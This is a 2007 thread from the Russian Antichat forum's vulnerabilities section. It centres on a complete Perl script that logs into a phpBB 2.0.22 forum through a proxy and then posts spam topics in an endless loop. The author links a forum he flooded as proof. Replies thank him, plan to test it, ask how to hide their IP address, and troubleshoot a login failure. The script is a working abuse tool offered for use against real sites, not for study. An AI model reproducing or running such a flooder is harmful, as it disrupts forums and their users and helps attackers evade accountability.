ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

флудер форума phpBB
  #1  
Старый 08.09.2007, 06:37
Аватар для C!klodoL
C!klodoL
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431

Репутация: 677
По умолчанию флудер форума phpBB

выкладываю флудер форума phpBB, тестировался на версии 2.0.22, результат испытаний вы можете наблюдать тут: nod*evice*.ru/*forum/*viewfo*rum.php?*f=*9*7 , * из ссылки естественно убрать
Код:
#!/usr/bin/perl

# phpBB2 флудер, тестировался на phpBB 2.0.22
# C!klodoL
# специально для antichat.ru

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;

my $forumurl = 'http://www.site.ru/forum/'; #путь к форуму
my $proxy    = 'localhost:4001';    #прокси
my $forumnum = 97;  #номер форума

my $username = 'Хэккер'; #ник от форума
my $password = 'P@$$w0rD'; #пароль

my $delay    = 30;  #антифлуд задержка
my $subject  = 'Превед!!!'; #тема топика
my $message  = 'Это не флуд =)))))))))))))))))))))))';  #текст сообщения

my $useragent = LWP::UserAgent->new;
my $cookies = HTTP::Cookies->new;
$useragent->cookie_jar($cookies);

if ($proxy)
{
    $useragent->proxy('http', "http://$proxy");
}

my $request = $useragent->post($forumurl.'login.php',
                               {username => $username,
                                password => $password,
                                redirect => '',
                                login => 'Log+in'})->as_string;

my ($sid) = $request =~ /index\.php\?sid=(.*)/;

print "[+] Get sid $sid\n";

if ($request =~ / 302 /)
{
    print "[+] Login successful, flooding...\n";
}
else
{
    print "[-] Cant logining\n";
    exit;
}
my $counter = 1;
while (1)
{
    $request = $useragent->post($forumurl.'posting.php',
                                {subject => $subject,
                                 message => $message,
                                 mode => 'newtopic',
                                 sid => $sid,
                                 f => $forumnum,
                                 post => 'Submit'});
    print "[+] Posting topic..".$counter++."\n";
    sleep ($delay);
}
P.S. Флуд это плохо и им занимаются только дети.

Последний раз редактировалось C!klodoL; 08.09.2007 в 10:38..
 
Ответить с цитированием

  #2  
Старый 08.09.2007, 07:39
Аватар для TrypoED
TrypoED
Banned
Регистрация: 22.04.2007
Сообщений: 213
Провел на форуме:
1031650

Репутация: 148
По умолчанию

ММ... Спасибо,щас затестим...
 
Ответить с цитированием

  #3  
Старый 08.09.2007, 11:56
Аватар для n0153r
n0153r
Постоянный
Регистрация: 19.06.2007
Сообщений: 315
Провел на форуме:
1174546

Репутация: 326
Отправить сообщение для n0153r с помощью ICQ
По умолчанию

+1 ! Продолжай в том же духе...
 
Ответить с цитированием

  #4  
Старый 08.09.2007, 12:32
Аватар для SpewFire
SpewFire
Banned
Регистрация: 14.03.2007
Сообщений: 82
Провел на форуме:
996198

Репутация: 85
Отправить сообщение для SpewFire с помощью ICQ
По умолчанию

СпС!!! +)))
 
Ответить с цитированием

  #5  
Старый 08.09.2007, 14:37
Аватар для Nightmarе
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763

Репутация: 1680


Отправить сообщение для Nightmarе с помощью ICQ
По умолчанию

Спасибо...
А можно ли это реализовать на сокетах??? чтобы свой айпи не палить... а то прокси это не...
 
Ответить с цитированием

  #6  
Старый 08.09.2007, 14:41
Аватар для C!klodoL
C!klodoL
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431

Репутация: 677
По умолчанию

Цитата:
Сообщение от Nightmarе  
Спасибо...
А можно ли это реализовать на сокетах??? чтобы свой айпи не палить... а то прокси это не...
на сокетах то можно, только зачем? у LWP и так поддержка прокси есть..
 
Ответить с цитированием

  #7  
Старый 08.09.2007, 14:43
Аватар для vadim399
vadim399
Banned
Регистрация: 27.05.2007
Сообщений: 368
Провел на форуме:
3969605

Репутация: 589
Отправить сообщение для vadim399 с помощью ICQ
По умолчанию

Спасибо, флудер пработает на 5+
 
Ответить с цитированием

  #8  
Старый 11.09.2007, 12:05
Аватар для N19hTW0lF
N19hTW0lF
Участник форума
Регистрация: 11.07.2007
Сообщений: 292
Провел на форуме:
2131521

Репутация: 512
По умолчанию

нормуль! +5
 
Ответить с цитированием

  #9  
Старый 29.09.2007, 16:42
Аватар для qwerty1
qwerty1
Новичок
Регистрация: 20.06.2007
Сообщений: 6
Провел на форуме:
29067

Репутация: 5
По умолчанию

пишет Cant logining,логин пароль указал верно,ссылку дал верно,форум 1 поставил,значение,выдает ошибку,хоть тресни
 
Ответить с цитированием

  #10  
Старый 29.09.2007, 18:09
Аватар для inv
inv
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141

Репутация: 291
По умолчанию

Если что.
Автор скрипта неопределенное оффлайн (со своего компа).

Последний раз редактировалось inv; 29.09.2007 в 18:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB 2.0.19 /Exploit/ 1d37r Форумы 3 27.08.2007 15:34
Флудер ля форума Ucoz SMERSH PHP, PERL, MySQL, JavaScript 5 24.07.2007 08:37
Подборка уязвимостей phpBB -=ka$at1k=- Форумы 3 02.07.2006 15:26
А нафига публиковать инфу о том как ломать чаты. Егорыч+++ Чаты 52 14.11.2005 20:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ